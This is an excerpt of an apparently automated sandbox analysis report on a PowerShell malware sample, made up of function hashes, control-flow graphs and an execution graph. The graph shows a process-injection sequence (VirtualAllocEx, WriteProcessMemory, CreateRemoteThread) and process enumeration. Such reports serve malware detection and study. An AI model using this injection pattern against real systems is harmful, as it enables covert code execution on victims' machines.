                                                                                      • API ID:
                                                                                      • String ID: 6$6$r6$r6$r6
                                                                                      • API String ID: 0-4263799821
                                                                                      • Opcode ID: 186e8b2dff34dd2bf6b5fdb99fb9e55f962221ddfe15af5f109a6d9a5644813f
                                                                                      • Instruction ID: 9e61fd7352b5a06269adc9dcd0429069d43267a171247fcdc931f02969c463a8
                                                                                      • Opcode Fuzzy Hash: 186e8b2dff34dd2bf6b5fdb99fb9e55f962221ddfe15af5f109a6d9a5644813f
                                                                                      • Instruction Fuzzy Hash: DF023432A0EB899FF7D5DB6898546B57BE1EF56310F0841BAD04DC7593DA28DC0AC381
                                                                                      Function 00007FFAAC708520 Relevance: 5.3, Strings: 4, Instructions: 304COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 102 7ffaac708520-7ffaac708567 104 7ffaac70856d-7ffaac708577 102->104 105 7ffaac708837-7ffaac70886d 102->105 106 7ffaac708593-7ffaac7085a0 104->106 107 7ffaac708579-7ffaac708591 104->107 119 7ffaac70886f-7ffaac708897 105->119 120 7ffaac708898-7ffaac7088d8 105->120 113 7ffaac7087d3-7ffaac7087dd 106->113 114 7ffaac7085a6-7ffaac7085a9 106->114 107->106 116 7ffaac7087ec-7ffaac708834 113->116 117 7ffaac7087df-7ffaac7087eb 113->117 114->113 118 7ffaac7085af-7ffaac7085bb 114->118 116->105 118->105 123 7ffaac7085c1-7ffaac7085cb 118->123 119->120 125 7ffaac7085cd-7ffaac7085da 123->125 126 7ffaac7085e4-7ffaac7085e9 123->126 125->126 132 7ffaac7085dc-7ffaac7085e2 125->132 126->113 131 7ffaac7085ef-7ffaac7085f4 126->131 133 7ffaac70860f 131->133 134 7ffaac7085f6-7ffaac70860d 131->134 132->126 137 7ffaac708611-7ffaac708613 133->137 134->137 137->113 139 7ffaac708619-7ffaac70861c 137->139 140 7ffaac70861e-7ffaac708641 139->140 141 7ffaac708643 139->141 142 7ffaac708645-7ffaac708647 140->142 141->142 142->113 144 7ffaac70864d-7ffaac708692 142->144 144->113 152 7ffaac708698-7ffaac7086a8 144->152 153 7ffaac7086aa-7ffaac7086b4 152->153 154 7ffaac7086b8 152->154 156 7ffaac7086d4-7ffaac7086f2 153->156 157 7ffaac7086b6 153->157 155 7ffaac7086bd-7ffaac7086ca 154->155 155->156 161 7ffaac7086cc-7ffaac7086d2 155->161 156->154 160 7ffaac7086f4-7ffaac7086fe 156->160 157->155 162 7ffaac708700-7ffaac708715 160->162 163 7ffaac708717-7ffaac708785 160->163 161->156 162->163 172 7ffaac7087a5-7ffaac7087a6 163->172 173 7ffaac708787-7ffaac7087a3 163->173 175 7ffaac7087ae-7ffaac7087ba 172->175 173->172 177 7ffaac7087bc-7ffaac7087c0 175->177 178 7ffaac7087c2-7ffaac7087c7 175->178 179 7ffaac7087c8-7ffaac7087d2 177->179 178->179
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$6$r6$r6
                                                                                      • API String ID: 0-3088321380
                                                                                      • Opcode ID: a7ae750f39563f94dfa4d75180a5728d3c0b94245e952aa5b390ded950844105
                                                                                      • Instruction ID: cef0838989e19e8579c8a095e28f23a920352e523b7c80fff75df15c8b60ced0
                                                                                      • Opcode Fuzzy Hash: a7ae750f39563f94dfa4d75180a5728d3c0b94245e952aa5b390ded950844105
                                                                                      • Instruction Fuzzy Hash: 94A12532A0AA4A9FFBE4DB6888546797BF1FF56315F1841BAD00DC3683DE24DC498781
                                                                                      Function 00007FFAAC70536F Relevance: 1.9, Strings: 1, Instructions: 604COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 340 7ffaac70536f-7ffaac7053c8 345 7ffaac7053f3-7ffaac70541b 340->345 346 7ffaac7053ca-7ffaac7053f1 340->346 352 7ffaac705422-7ffaac705433 345->352 353 7ffaac70541d 345->353 346->345 355 7ffaac705435 352->355 356 7ffaac70543a-7ffaac70544b 352->356 353->352 354 7ffaac70541f 353->354 354->352 355->356 357 7ffaac705437 355->357 358 7ffaac705452-7ffaac705467 356->358 359 7ffaac70544d 356->359 357->356 361 7ffaac705468-7ffaac7054ba 358->361 359->358 360 7ffaac70544f 359->360 360->358 365 7ffaac7054bc-7ffaac7054f7 361->365 367 7ffaac705797-7ffaac7057be 365->367 368 7ffaac7054fd-7ffaac705507 365->368 373 7ffaac7057c0-7ffaac7057d9 367->373 374 7ffaac7057db-7ffaac7057f1 367->374 369 7ffaac705509-7ffaac705521 368->369 370 7ffaac705523-7ffaac705530 368->370 369->370 378 7ffaac705536-7ffaac705539 370->378 379 7ffaac70572b-7ffaac705735 370->379 373->374 388 7ffaac7057f3-7ffaac70581b 374->388 389 7ffaac70581c-7ffaac70585a 374->389 378->379 381 7ffaac70553f-7ffaac70554b 378->381 382 7ffaac705737-7ffaac705743 379->382 383 7ffaac705744-7ffaac705794 379->383 381->367 386 7ffaac705551-7ffaac70555b 381->386 383->367 390 7ffaac705574-7ffaac705579 386->390 391 7ffaac70555d-7ffaac70556a 386->391 388->389 390->379 396 7ffaac70557f-7ffaac705584 390->396 391->390 397 7ffaac70556c-7ffaac705572 391->397 396->379 399 7ffaac70558a-7ffaac70558f 396->399 397->390 401 7ffaac705591-7ffaac7055a8 399->401 402 7ffaac7055aa 399->402 405 7ffaac7055ac-7ffaac7055ae 401->405 402->405 405->379 407 7ffaac7055b4-7ffaac7055b7 405->407 407->379 408 7ffaac7055bd-7ffaac7055cd 407->408 409 7ffaac7055cf-7ffaac7055d9 408->409 410 7ffaac7055dd 408->410 411 7ffaac7055f9-7ffaac705609 409->411 412 7ffaac7055db 409->412 414 7ffaac7055e2-7ffaac7055ef 410->414 415 7ffaac705616-7ffaac705634 411->415 416 7ffaac70560b-7ffaac705614 411->416 412->414 414->411 419 7ffaac7055f1-7ffaac7055f7 414->419 415->410 421 7ffaac705636-7ffaac705640 415->421 416->415 419->411 422 7ffaac705659-7ffaac705685 421->422 423 7ffaac705642-7ffaac705657 421->423 431 7ffaac705687-7ffaac7056ba 422->431 423->422 434 7ffaac7056ce-7ffaac7056db 431->434 435 7ffaac7056bc-7ffaac7056ca 431->435 437 7ffaac7056f8-7ffaac7056fd 434->437 438 7ffaac7056dd-7ffaac7056f6 434->438 435->431 439 7ffaac7056cc-7ffaac7056cd 435->439 441 7ffaac705706-7ffaac705712 437->441 438->437 439->434 442 7ffaac705714-7ffaac705718 441->442 443 7ffaac70571a-7ffaac70571f 441->443 445 7ffaac705720-7ffaac70572a 442->445 443->445
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: }
                                                                                      • API String ID: 0-642806570
                                                                                      • Opcode ID: e2ccda88c90fde82f256ce261ab63ab8897673e106726d21c3a301f18abf493a
                                                                                      • Instruction ID: fe2562e457918e33e1678dd40b711ac03cad90aea39be2227f661ca2ffb3b2f9
                                                                                      • Opcode Fuzzy Hash: e2ccda88c90fde82f256ce261ab63ab8897673e106726d21c3a301f18abf493a
                                                                                      • Instruction Fuzzy Hash: D012227190EB899FEBD5DB2888595B57BF1EF56310B0881BED04DC7193CA28EC0AC785
                                                                                      Function 00007FFAAC64AAA4 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 447 7ffaac64aaa4-7ffaac64aaab 448 7ffaac64aaad-7ffaac64aab5 447->448 449 7ffaac64aab6-7ffaac64ab1f 447->449 448->449 451 7ffaac64ab21-7ffaac64ab26 449->451 452 7ffaac64ab29-7ffaac64ab5b LoadLibraryExW 449->452 451->452 453 7ffaac64ab5d 452->453 454 7ffaac64ab63-7ffaac64ab8a 452->454 453->454
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: 1b4e937d1205f50d502a18d93e0c3c757d2db69d59f2142e509b637900c40bf3
                                                                                      • Instruction ID: b18d8213904c0c30560835ccc0b09690d92d2a981fef325db9f7ec3a67946ba3
                                                                                      • Opcode Fuzzy Hash: 1b4e937d1205f50d502a18d93e0c3c757d2db69d59f2142e509b637900c40bf3
                                                                                      • Instruction Fuzzy Hash: FF31E13190CA4C9FDB19DB68D849AE9BBE0FF56320F04822BD009D3252DB74A845CB91
                                                                                      Function 00007FFAAC64A4BA Relevance: 1.6, APIs: 1, Instructions: 99libraryCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 456 7ffaac64a4ba-7ffaac64ab1f 459 7ffaac64ab21-7ffaac64ab26 456->459 460 7ffaac64ab29-7ffaac64ab5b LoadLibraryExW 456->460 459->460 461 7ffaac64ab5d 460->461 462 7ffaac64ab63-7ffaac64ab8a 460->462 461->462
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID: LibraryLoad
                                                                                      • String ID:
                                                                                      • API String ID: 1029625771-0
                                                                                      • Opcode ID: f75656a75ef35eb123a2fe076b6e2cb47837630de56ae4cf2686132356238dc7
                                                                                      • Instruction ID: c680b42f3774ff98a48b3712211251e5e939fe0d1662fc69d015756fa5822084
                                                                                      • Opcode Fuzzy Hash: f75656a75ef35eb123a2fe076b6e2cb47837630de56ae4cf2686132356238dc7
                                                                                      • Instruction Fuzzy Hash: E9217E71908A1C9FDB58DF58D849AE9BBE1FB69321F00822ED00ED3651DB70A8468B81
                                                                                      Function 00007FFAAC70283D Relevance: .3, Instructions: 285COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 512 7ffaac70283d-7ffaac7028c7 514 7ffaac7029ff-7ffaac702a59 512->514 515 7ffaac7028cd-7ffaac7028d7 512->515 535 7ffaac702a84-7ffaac702ab1 514->535 536 7ffaac702a5b-7ffaac702a82 514->536 516 7ffaac7028d9-7ffaac7028f1 515->516 517 7ffaac7028f3-7ffaac702900 515->517 516->517 523 7ffaac702906-7ffaac702909 517->523 524 7ffaac7029a0-7ffaac7029aa 517->524 523->524 526 7ffaac70290f-7ffaac702917 523->526 528 7ffaac7029b9-7ffaac7029fc 524->528 529 7ffaac7029ac-7ffaac7029b8 524->529 526->514 531 7ffaac70291d-7ffaac702927 526->531 528->514 533 7ffaac702929-7ffaac70293e 531->533 534 7ffaac702940-7ffaac702944 531->534 533->534 534->524 539 7ffaac702946-7ffaac702949 534->539 550 7ffaac702ab4-7ffaac702ac5 535->550 551 7ffaac702ab3 535->551 536->535 539->524 541 7ffaac70294b-7ffaac70297b 539->541 555 7ffaac70297d-7ffaac702987 541->555 553 7ffaac702ac8-7ffaac702ad9 550->553 554 7ffaac702ac7 550->554 551->550 554->553 556 7ffaac70298e-7ffaac70299f 555->556
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2509bd0e6a51e8b6f3b02d89d1af336ca10d022e1dc2d721b6e268030461c7b
                                                                                      • Instruction ID: c1836d8f53e203dfae4f37f12afbc5b3d5d7c9351154ef3cd0eb0839decc4fec
                                                                                      • Opcode Fuzzy Hash: a2509bd0e6a51e8b6f3b02d89d1af336ca10d022e1dc2d721b6e268030461c7b
                                                                                      • Instruction Fuzzy Hash: 8B811562A1EA8A9FE7E6DB2C48556B57FE0EF56210B1841FAD08DC7193DD18DC0AC3C1
                                                                                      Function 00007FFAAC702863 Relevance: .1, Instructions: 140COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 557 7ffaac702863-7ffaac7028c7 561 7ffaac7029ff-7ffaac702a59 557->561 562 7ffaac7028cd-7ffaac7028d7 557->562 582 7ffaac702a84-7ffaac702ab1 561->582 583 7ffaac702a5b-7ffaac702a82 561->583 563 7ffaac7028d9-7ffaac7028f1 562->563 564 7ffaac7028f3-7ffaac702900 562->564 563->564 570 7ffaac702906-7ffaac702909 564->570 571 7ffaac7029a0-7ffaac7029aa 564->571 570->571 573 7ffaac70290f-7ffaac702917 570->573 575 7ffaac7029b9-7ffaac7029fc 571->575 576 7ffaac7029ac-7ffaac7029b8 571->576 573->561 578 7ffaac70291d-7ffaac702927 573->578 575->561 580 7ffaac702929-7ffaac70293e 578->580 581 7ffaac702940-7ffaac702944 578->581 580->581 581->571 586 7ffaac702946-7ffaac702949 581->586 597 7ffaac702ab4-7ffaac702ac5 582->597 598 7ffaac702ab3 582->598 583->582 586->571 588 7ffaac70294b-7ffaac702987 586->588 603 7ffaac70298e-7ffaac70299f 588->603 600 7ffaac702ac8-7ffaac702ad9 597->600 601 7ffaac702ac7 597->601 598->597 601->600
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0429936fd007c0f5a32abcbeb178a1a1c13614f3db1ac75cc932dab7b6f0db56
                                                                                      • Instruction ID: 5620270f18adc5c97f1d8030bf789e190a8bf9825c14db161842d85c9f973df8
                                                                                      • Opcode Fuzzy Hash: 0429936fd007c0f5a32abcbeb178a1a1c13614f3db1ac75cc932dab7b6f0db56
                                                                                      • Instruction Fuzzy Hash: 3F41C22291EB9A9FE7D6DB6844986747FF0EF56210B4840FAC04DDB193D928DC09C7C1

                                                                                      Non-executed Functions

                                                                                      Function 00007FFAAC6411D3 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 2O_^
                                                                                      • API String ID: 0-2974816419
                                                                                      • Opcode ID: 8353b451198fe71e8b4753c60720298820571aede2531c5a37f669e4618b5c71
                                                                                      • Instruction ID: 858a5279a9d1aa8c19461580011c56f03bed136c4e32d9aa4000b96f42048457
                                                                                      • Opcode Fuzzy Hash: 8353b451198fe71e8b4753c60720298820571aede2531c5a37f669e4618b5c71
                                                                                      • Instruction Fuzzy Hash: 5D61C25B90C16266E65273B9B4629FBBF10FF82739B08D177D28DCD2938D08688582E5
                                                                                      Function 00007FFAAC6410FA Relevance: .3, Instructions: 340COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ca04231eec50e4afb8eb8f12171ef53f5112393e3cb73edc7e717513006a6db3
                                                                                      • Instruction ID: f66fe1697936cfb7333683b3eb78259725509f1cdeae62236d7410c6133aeaec
                                                                                      • Opcode Fuzzy Hash: ca04231eec50e4afb8eb8f12171ef53f5112393e3cb73edc7e717513006a6db3
                                                                                      • Instruction Fuzzy Hash: CA91155BA0C57266E64273BEF4619FB7F10FF82735B089173D28DCD1938D08288A82E5
                                                                                      Function 00007FFAAC64BCF3 Relevance: .1, Instructions: 108COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1557608225.00007FFAAC630000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC630000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac630000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6cd6707fadac5d61bd84bc6696791171e98da9e5feb1aafdf21cc274c4bad027
                                                                                      • Instruction ID: 825e56bc34394a1c27c82772e642ea35bfbeb884031adeeb06faab992e79957a
                                                                                      • Opcode Fuzzy Hash: 6cd6707fadac5d61bd84bc6696791171e98da9e5feb1aafdf21cc274c4bad027
                                                                                      • Instruction Fuzzy Hash: D631F27B50CA62AB9702BBB8F8655EAB790FF40324B40853AC38ECD163DD14B492C7C4
                                                                                      Function 00007FFAAC704199 Relevance: 6.6, Strings: 5, Instructions: 356COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.1558308632.00007FFAAC700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC700000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_7ffaac700000_powershell.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 6$6$r6$r6$M_H
                                                                                      • API String ID: 0-1509768076
                                                                                      • Opcode ID: 4f7400448561d4f3ea3502219480babe682f38363fa846a01553671e82a2a35a
                                                                                      • Instruction ID: ca16e57eb12e49462612691e2f2d18c98facdf8cf5a9d89311e6974a4b1ce0a8
                                                                                      • Opcode Fuzzy Hash: 4f7400448561d4f3ea3502219480babe682f38363fa846a01553671e82a2a35a
                                                                                      • Instruction Fuzzy Hash: 8FB10361A0EA9A9FF7E9CB1884556747BE1EF56310F0881BED44DC7192DE28EC0987C0

                                                                                      Execution Graph

                                                                                      Execution Coverage:15.4%
                                                                                      Dynamic/Decrypted Code Coverage:0.3%
                                                                                      Signature Coverage:32.9%
                                                                                      Total number of Nodes:636
                                                                                      Total number of Limit Nodes:1
                                                                                      execution_graph 4099 7ffb22651910 4109 7ffb22651919 4099->4109 4130 7ffb22651c97 4099->4130 4100 7ffb22654150 6 API calls 4100->4109 4101 7ffb22653f70 45 API calls 4101->4109 4102 7ffb226519fc 4103 7ffb22654920 4 API calls 4102->4103 4105 7ffb22651a06 VirtualAllocEx WriteProcessMemory 4103->4105 4104 7ffb22653f50 45 API calls 4104->4109 4106 7ffb22654920 4 API calls 4105->4106 4108 7ffb22651a83 VirtualAllocEx WriteProcessMemory 4106->4108 4107 7ffb22651cfe 4113 7ffb22654920 4 API calls 4108->4113 4109->4100 4109->4101 4109->4102 4109->4104 4109->4107 4110 7ffb22651cf6 4109->4110 4111 7ffb22651d11 _invalid_parameter_noinfo_noreturn 4109->4111 4112 7ffb22654918 free 4110->4112 4111->4099 4112->4107 4114 7ffb22651b09 VirtualAllocEx WriteProcessMemory CreateRemoteThread 4113->4114 4115 7ffb22654920 4 API calls 4114->4115 4116 7ffb22651bab WaitForSingleObject 4115->4116 4117 7ffb22654918 free 4116->4117 4118 7ffb22651be1 VirtualFreeEx 4117->4118 4119 7ffb22654918 free 4118->4119 4120 7ffb22651c05 VirtualFreeEx 4119->4120 4121 7ffb22654918 free 4120->4121 4122 7ffb22651c2a VirtualFreeEx 4121->4122 4123 7ffb22654918 free 4122->4123 4124 7ffb22651c4f 4123->4124 4125 7ffb22651c8b 4124->4125 4126 7ffb22651c80 4124->4126 4128 7ffb22651c79 _invalid_parameter_noinfo_noreturn 4124->4128 4127 7ffb22654570 8 API calls 4125->4127 4129 7ffb22654918 free 4126->4129 4127->4130 4128->4126 4129->4125 4241 7ffb22655750 4242 7ffb22655799 4241->4242 4243 7ffb22655762 4241->4243 4243->4242 4244 7ffb22655791 4243->4244 4245 7ffb226557c5 _invalid_parameter_noinfo_noreturn 4243->4245 4246 7ffb22654918 free 4244->4246 4246->4242 4247 7ffb22654658 4248 7ffb2265467c __scrt_release_startup_lock 4247->4248 4249 7ffb22655360 _seh_filter_dll 4248->4249 4161 7ffb226543c0 4162 7ffb226543ea 4161->4162 4163 7ffb226543ce 4161->4163 4163->4162 4164 7ffb22654918 free 4163->4164 4164->4162 4196 7ffb22651d80 4197 7ffb22651da4 4196->4197 4216 7ffb22651f4f 4196->4216 4199 7ffb22654150 6 API calls 4197->4199 4198 7ffb22654570 8 API calls 4200 7ffb22651f76 4198->4200 4201 7ffb22651de1 4199->4201 4202 7ffb22653f70 45 API calls 4201->4202 4203 7ffb22651e2b 4201->4203 4202->4201 4204 7ffb22651e38 4203->4204 4205 7ffb22653f70 45 API calls 4203->4205 4206 7ffb22651f7b 4204->4206 4207 7ffb22651e6a 4204->4207 4205->4204 4208 7ffb22653f50 45 API calls 4206->4208 4209 7ffb22651e84 malloc 4207->4209 4211 7ffb22651eda WriteProcessMemory 4207->4211 4210 7ffb22651f80 4208->4210 4212 7ffb22651ea1 free 4209->4212 4213 7ffb22651ea7 ReadProcessMemory 4209->4213 4214 7ffb22651fa0 WriteProcessMemory 4210->4214 4215 7ffb22651fe9 4210->4215 4211->4216 4217 7ffb22651f19 4211->4217 4212->4213 4213->4211 4214->4215 4218 7ffb22651fd8 free 4214->4218 4216->4198 4219 7ffb22651f44 4217->4219 4220 7ffb22651f3d _invalid_parameter_noinfo_noreturn 4217->4220 4218->4215 4221 7ffb22654918 free 4219->4221 4220->4219 4221->4216 4222 7ffb22654480 __std_type_info_compare 4223 7ffb2265449e 4222->4223 4224 7ffb22651080 4225 7ffb226510c0 4224->4225 4226 7ffb226510df 7 API calls 4225->4226 4227 7ffb22651297 4225->4227 4228 7ffb22651230 WriteProcessMemory 4226->4228 4229 7ffb22651261 WriteProcessMemory 4226->4229 4228->4229 4229->4227 4250 7ffb22651d40 4251 7ffb22651d4e VirtualFreeEx 4250->4251 4252 7ffb22651d77 4250->4252 4251->4252 4253 7ffb22654540 4254 7ffb22654550 4253->4254 4255 7ffb22654549 free 4253->4255 4255->4254 4256 7ffb22655640 4257 7ffb22655652 WriteProcessMemory 4256->4257 4260 7ffb226556b7 4256->4260 4258 7ffb2265568d free 4257->4258 4257->4260 4259 7ffb226556a4 free 4258->4259 4258->4260 4259->4260 3704 7ffaac6645a1 3705 7ffaac6645bf 3704->3705 3708 7ffb22652010 CreateToolhelp32Snapshot 3705->3708 3709 7ffb22652052 Process32First 3708->3709 3710 7ffb226520f3 3708->3710 3711 7ffb22652068 3709->3711 3763 7ffb22652550 3710->3763 3711->3710 3713 7ffb22652070 strcmp 3711->3713 3715 7ffb22652095 3713->3715 3716 7ffb22652085 Process32Next 3713->3716 3714 7ffb226520ff 3717 7ffb2265210f 3714->3717 3718 7ffb22652200 3714->3718 3727 7ffb22654920 3715->3727 3716->3711 3769 7ffb22654200 CreateToolhelp32Snapshot 3717->3769 3783 7ffb22654570 3718->3783 3721 7ffb2265209f 3738 7ffb22651720 3721->3738 3725 7ffb226520d9 3725->3710 3728 7ffb2265493a malloc 3727->3728 3729 7ffb2265492b 3728->3729 3730 7ffb22654944 3728->3730 3729->3728 3731 7ffb2265494a 3729->3731 3730->3721 3732 7ffb22654955 3731->3732 3792 7ffb22655190 3731->3792 3795 7ffb22651400 3732->3795 3735 7ffb2265495b 3736 7ffb2265497e 3735->3736 3798 7ffb22654918 3735->3798 3736->3721 3739 7ffb22651744 memcpy 3738->3739 3744 7ffb22651765 3738->3744 3756 7ffb2265184c 3739->3756 3741 7ffb22651871 3802 7ffb226514a0 ?_Xlength_error@std@@YAXPEBD 3741->3802 3743 7ffb22651876 3748 7ffb22651400 Concurrency::cancel_current_task __std_exception_copy 3743->3748 3744->3741 3745 7ffb226517e9 3744->3745 3746 7ffb226517b4 3744->3746 3749 7ffb226517d2 3745->3749 3750 7ffb22654920 4 API calls 3745->3750 3746->3743 3747 7ffb22654920 4 API calls 3746->3747 3747->3749 3751 7ffb2265187c 3748->3751 3752 7ffb226517fe memcpy 3749->3752 3753 7ffb2265186a _invalid_parameter_noinfo_noreturn 3749->3753 3750->3749 3754 7ffb22651900 3751->3754 3757 7ffb226518dc WriteProcessMemory 3751->3757 3758 7ffb2265189c 3751->3758 3755 7ffb2265181f 3752->3755 3752->3756 3753->3741 3754->3725 3755->3753 3759 7ffb22651844 3755->3759 3756->3725 3757->3754 3760 7ffb226518b8 WriteProcessMemory 3758->3760 3761 7ffb226518ca WriteProcessMemory 3758->3761 3762 7ffb22654918 free 3759->3762 3760->3725 3761->3725 3762->3756 3764 7ffb226525a0 3763->3764 3765 7ffb22652569 3763->3765 3764->3714 3765->3764 3766 7ffb22652598 3765->3766 3767 7ffb226525cc _invalid_parameter_noinfo_noreturn 3765->3767 3768 7ffb22654918 free 3766->3768 3767->3714 3768->3764 3770 7ffb2265425d Module32First 3769->3770 3771 7ffb2265434a 3769->3771 3774 7ffb22654273 3770->3774 3772 7ffb22654570 8 API calls 3771->3772 3773 7ffb22652119 3772->3773 3773->3718 3774->3771 3775 7ffb226542b1 memcmp 3774->3775 3776 7ffb226542c2 Module32Next 3774->3776 3775->3776 3777 7ffb226542d2 OpenProcess 3775->3777 3776->3774 3778 7ffb22654920 4 API calls 3777->3778 3779 7ffb22654302 3778->3779 3780 7ffb22654920 4 API calls 3779->3780 3781 7ffb2265431b 3780->3781 3782 7ffb22654920 4 API calls 3781->3782 3782->3771 3786 7ffb22654579 3783->3786 3784 7ffb22654d1c IsProcessorFeaturePresent 3787 7ffb22654d34 3784->3787 3785 7ffaac664631 3786->3784 3786->3785 4094 7ffb22654df0 RtlCaptureContext 3787->4094 3801 7ffb22655170 3792->3801 3794 7ffb2265519e _CxxThrowException 3796 7ffb2265140e Concurrency::cancel_current_task 3795->3796 3797 7ffb2265141f __std_exception_copy 3796->3797 3797->3735 3799 7ffb22654910 free 3798->3799 3801->3794 3803 7ffb226515ca 3802->3803 3804 7ffb226514e3 3802->3804 3806 7ffb22654570 8 API calls 3803->3806 3805 7ffb22654920 4 API calls 3804->3805 3807 7ffb226514ed 3805->3807 3808 7ffb226515d7 3806->3808 3809 7ffb2265154f 3807->3809 3814 7ffb22653b70 3807->3814 3808->3743 3811 7ffb22651597 3809->3811 3812 7ffb22654920 4 API calls 3809->3812 3835 7ffb226536e0 3811->3835 3812->3811 3816 7ffb22653b91 3814->3816 3815 7ffb22653d65 3819 7ffb22651400 Concurrency::cancel_current_task __std_exception_copy 3815->3819 3816->3815 3818 7ffb22653c2a 3816->3818 3821 7ffb22653bf7 3816->3821 3822 7ffb22653d6a 3816->3822 3824 7ffb22654920 4 API calls 3818->3824 3826 7ffb22653c0c 3818->3826 3819->3822 3821->3815 3823 7ffb22654920 4 API calls 3821->3823 3876 7ffb22653d80 ?_Xlength_error@std@@YAXPEBD 3822->3876 3823->3826 3824->3826 3825 7ffb22653c42 memcpy 3827 7ffb22653cb1 memcpy memcpy 3825->3827 3828 7ffb22653c8c memcpy memset 3825->3828 3826->3825 3829 7ffb22653d5e _invalid_parameter_noinfo_noreturn 3826->3829 3830 7ffb22653ce5 memset 3827->3830 3828->3830 3829->3815 3831 7ffb22653d3c 3830->3831 3832 7ffb22653d07 3830->3832 3831->3809 3832->3829 3833 7ffb22653d34 3832->3833 3834 7ffb22654918 free 3833->3834 3834->3831 3836 7ffb22653b32 3835->3836 3837 7ffb2265371d 3835->3837 3838 7ffb22654570 8 API calls 3836->3838 3839 7ffb22653727 ReadProcessMemory memcmp 3837->3839 3840 7ffb22653778 3837->3840 3841 7ffb22653b3e 3838->3841 3839->3836 3839->3840 3877 7ffb226531a0 3840->3877 3841->3803 3843 7ffb2265381c 3957 7ffb22653f70 3843->3957 3844 7ffb22653ae1 _invalid_parameter_noinfo_noreturn 3848 7ffb22653ae8 3844->3848 3845 7ffb2265377d 3845->3843 3845->3844 3846 7ffb22654918 free 3845->3846 3846->3843 3850 7ffb22654918 free 3848->3850 3855 7ffb22653af3 3850->3855 3851 7ffb2265387b 3853 7ffb226538ab 3851->3853 3854 7ffb22653f70 45 API calls 3851->3854 3852 